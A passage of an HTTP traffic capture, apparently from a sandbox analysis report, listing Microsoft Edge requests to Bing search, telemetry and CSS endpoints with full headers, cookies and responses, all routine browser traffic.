Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:47 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144347.1d701c06
GET

https://www.bing.com/fd/ls/GLinkPing.aspx?IG=ACC4C3B51F2946CCA132A82824F773C3&ID=autosuggest,5003.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:1223}

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/GLinkPing.aspx?IG=ACC4C3B51F2946CCA132A82824F773C3&ID=autosuggest,5003.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:1223} HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: private
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Access-Control-Allow-Origin: *
X-EventID: 670163ddf236426b88d751e6e941a0af
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-/6mrEMjDlBoeRyUKhfeSUmIctjtmU4R5tjCfH4v1s0Q='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 0DBEF4CC716A495EAD04B3AA0945A662 Ref B: LON601060104036 Ref C: 2024-10-05T16:05:49Z
Content-Length: 0
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:49 GMT; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144349.1d701e35
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 272
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0
GET

https://r.bing.com/rp/kBFmfMwTm-h9PAKt-tzqA5YW52k.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/kBFmfMwTm-h9PAKt-tzqA5YW52k.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 394
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: q+yXbyUceita8NbldsqQwg==
Last-Modified: Fri, 13 Sep 2024 14:55:48 GMT
ETag: 0x8DCD40427661878
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 837da7bf-301e-009e-1757-0f1772000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=97164
Expires: Sun, 06 Oct 2024 19:04:53 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144328.f0972c5
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/5W/cir3,cc,nc/S2YMC8NxUY-VQtAiYzxhzjDCV2E.css?bu=DZ9D-USdRqBG8kaKTrdQhwHwRb5DhwGoT4cB&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/5W/cir3,cc,nc/S2YMC8NxUY-VQtAiYzxhzjDCV2E.css?bu=DZ9D-USdRqBG8kaKTrdQhwHwRb5DhwGoT4cB&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 2032
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Wed, 01 Sep 2010 16:42:12 GMT
X-EventID: 66fef2cce509430ca4eba22ae2a1faa3
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E06B
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-l3YxsOGC9ash0eeXrzC95Y5kXji5g1/It0oXAaQuhMM='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=272210
Expires: Tue, 08 Oct 2024 19:42:19 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0972f0
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/ILpAc2VIof0cr4Py3y4rAFMboow.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/ILpAc2VIof0cr4Py3y4rAFMboow.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 85
Content-Type: text/css
Content-Encoding: br
Content-MD5: jEIZ4hw9ZiVJKtrBxiHDuQ==
Last-Modified: Tue, 24 Sep 2024 06:09:08 GMT
ETag: 0x8DCDC5F66D174F1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b369ffd9-001e-0033-5fa3-14b3bd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=144721
Expires: Mon, 07 Oct 2024 08:17:30 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097435
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_uzlXsRnS5Ra0MSF1ACv1JzUOlU.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/_uzlXsRnS5Ra0MSF1ACv1JzUOlU.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 256
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: fqV0JA+jGQeYnere1LJCEA==
Last-Modified: Thu, 15 Sep 2022 21:36:42 GMT
ETag: 0x8DA976261A75D24
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 52f5aed7-401e-0094-2dff-13b3c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=74290
Expires: Sun, 06 Oct 2024 12:43:39 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
